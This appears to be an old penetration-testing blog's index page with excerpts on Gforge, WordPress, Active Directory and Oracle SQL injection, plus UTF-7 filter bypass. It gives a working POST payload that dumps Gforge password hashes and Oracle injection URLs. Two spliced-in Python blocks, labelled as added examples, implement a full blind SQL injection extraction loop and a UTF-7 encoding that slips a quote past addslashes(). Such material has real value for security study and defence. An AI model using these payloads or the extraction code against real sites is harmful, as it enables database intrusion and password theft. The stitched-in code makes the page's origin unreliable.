Gforge SQL Injection

September 13, 2007

Original Advisory: http://www.portcullis-security.com/179.php

The file /www/people/editprofile.php appears to be vulnerable to SQL injection at multiple points. The exploit is fairly easy: a single POST request returns all the usernames and password hashes from the backend database. The hashes can then be cracked with John the Ripper.

Exploit:- POST request to /www/people/editprofile.php

skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+from+users--%3d1&MultiDelete=Delete

works against…

Yet Another Insecure WordPress Code

August 29, 2007

Package:- wordpress 2.2.2.zip
File:- /wp-admin/admin-functions.php

    function validate_file( $file, $allowed_files = '' ) {
            if ( false !== strpos( $file, './' ))
                    return 1;
            if (':' == substr( $file, 1, 1 ))
                    return 2;
            if (!empty ( $allowed_files ) && (!in_array( $file, $allowed_files ) ) )…

Pen Testing Windows Active Directory

July 28, 2007

I have put together some thoughts on conducting a penetration test of a Windows Active Directory. Currently this article focuses on these two scenarios:-

1. The pentester is allowed to plug his laptop into the target network.
2. The pentester is not allowed to plug his laptop in and only has…

SQL Injection In Oracle

July 11, 2007

1. Finding table names

select table_name from user_tables

Example:-
http://192.168.2.199/ora.php?id=101+union+all+select+table_name+from+user_tables

Blind Injection:
http://192.168.2.199/ora.php?id=101 and ascii(substr((select+table_name+from+user_tables where rownum=1),1,1))>100

2. Iterating through the different rows

Unfortunately this is not as straightforward, because Oracle has no LIMIT clause; rows are selected by wrapping the query in a subselect that exposes ROWNUM.

Syntax:-
select column_1, column_2 from (select rownum r_, column_1, column_2 from table_1, table_2 where…
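The following is an added example, not code from the original post: it carries the two steps above (picking row n through a ROWNUM subselect, and reading that row back one character at a time with the ascii(substr(...))>N comparison) through to a working extraction loop. The HTTP side is replaced by a simulated backend that evaluates the injected condition against a constructed list of table names; the table names, the URL-free oracle function and the `r_ = n` form of the pagination wrapper are all assumptions for the illustration. Against a real target the oracle function would issue the request and compare the response with the "condition true" page.

```python
import re

# Constructed stand-in for the rows a real USER_TABLES view would return.
FAKE_USER_TABLES = ["USERS", "EMPLOYEES", "SALARIES"]


def row_n_query(n: int) -> str:
    """Select row n (1-based) of user_tables. Oracle has no LIMIT, so the
    row is picked by wrapping an ordered subselect and filtering on ROWNUM."""
    return ("select table_name from (select rownum r_, table_name from "
            "(select table_name from user_tables order by table_name)) "
            "where r_ = %d" % n)


def blind_payload(n: int, pos: int, threshold: int) -> str:
    """Boolean condition to append to the injected query: is the ASCII code
    of character `pos` of row n greater than `threshold`?"""
    return "ascii(substr((%s),%d,1))>%d" % (row_n_query(n), pos, threshold)


_COND = re.compile(r"ascii\(substr\(\((.*)\),(\d+),1\)\)>(\d+)")
_ROW = re.compile(r"where r_ = (\d+)$")


def simulated_backend(condition: str) -> bool:
    """Stand-in for the HTTP oracle (assumption, not a real database):
    evaluates the condition against FAKE_USER_TABLES the way Oracle would,
    returning True when the page would render its 'condition true' variant."""
    m = _COND.fullmatch(condition)
    if m is None:
        raise ValueError("unexpected condition: %s" % condition)
    inner, pos, threshold = m.group(1), int(m.group(2)), int(m.group(3))
    n = int(_ROW.search(inner).group(1))
    rows = sorted(FAKE_USER_TABLES)
    if n > len(rows):
        return False        # no such row: substr(NULL) is NULL, comparison is not true
    value = rows[n - 1]
    if pos > len(value):
        return False        # substr past the end of the string is NULL as well
    return ord(value[pos - 1]) > threshold


def extract_char(oracle, n: int, pos: int) -> int:
    """Binary-search the character code in [0, 127] with the '>' oracle:
    seven requests per character instead of up to 127. A NULL (missing row
    or end of string) answers False to every threshold and so comes back
    as 0, which the callers use as the terminator."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(blind_payload(n, pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_row(oracle, n: int) -> str:
    """Read row n character by character until the NULL terminator."""
    chars = []
    pos = 1
    while True:
        code = extract_char(oracle, n, pos)
        if code == 0:
            return "".join(chars)
        chars.append(chr(code))
        pos += 1


def extract_all(oracle, max_rows: int = 50) -> list:
    """Walk rows 1, 2, 3, ... until a row comes back empty (no more rows)."""
    rows = []
    for n in range(1, max_rows + 1):
        row = extract_row(oracle, n)
        if not row:
            break
        rows.append(row)
    return rows


if __name__ == "__main__":
    print(extract_all(simulated_backend))
```

The ORDER BY inside the innermost subselect matters: without it Oracle gives no guarantee that row n is the same row on every request, and the character-by-character reads of one "row" could come from different rows.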

SQL Injection And UTF 7 encoding

July 5, 2007

Query:- There is a web application vulnerable to SQL injection, but the web server has added protection such as magic_quotes, or the application calls addslashes(), which means I can't insert a single quote and thus can't exploit the SQL injection. The injection point is in a string field. Does…
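An added example, not part of the original post, showing what the single quote in such a payload looks like once it is written as a UTF-7 shift sequence, and that an addslashes()-style filter (modelled here in Python, as an assumption about the filter's behaviour) leaves the encoded form untouched because the byte it looks for is no longer there. It only demonstrates the filter side: whether the injection then succeeds depends on the application or database decoding the input as UTF-7, which the post leaves as the open question. The payload strings are constructed for the illustration.

```python
import base64


def utf7_encode_chars(s: str, chars: str = "'") -> str:
    """Replace each character in `chars` with its UTF-7 shift sequence,
    "+" + base64(UTF-16BE code unit, padding stripped) + "-".
    A single quote (U+0027) becomes +ACc-. Everything else is copied
    unchanged; a literal '+' in the input would have to become '+-' to stay
    valid UTF-7, and the sample payloads below contain none."""
    out = []
    for ch in s:
        if ch in chars:
            b64 = base64.b64encode(ch.encode("utf-16-be")).decode("ascii").rstrip("=")
            out.append("+" + b64 + "-")
        else:
            out.append(ch)
    return "".join(out)


def utf7_decode(s: str) -> str:
    """What a consumer that interprets the input as UTF-7 would see."""
    return s.encode("ascii").decode("utf-7")


def php_addslashes(s: str) -> str:
    """Model of PHP's addslashes(): a backslash before ' " \\ and NUL,
    nothing else. magic_quotes_gpc applied the same transformation to
    request data."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def passes_unchanged(payload: str) -> bool:
    """True when the filter has nothing to escape in the payload."""
    return php_addslashes(payload) == payload


if __name__ == "__main__":
    raw = "' or '1'='1"
    encoded = utf7_encode_chars(raw)
    print("raw     :", raw, "->", php_addslashes(raw))
    print("utf-7   :", encoded, "->", php_addslashes(encoded))
    print("decoded :", utf7_decode(encoded))
```

The decoded value is only what a UTF-7-aware layer would reconstruct; a backend that treats the bytes as ISO-8859-1 or UTF-8 sees the literal string +ACc- and no quote at all, so the check to run against a real target is whether the response changes between the raw and the encoded form, not whether the filter let the bytes through.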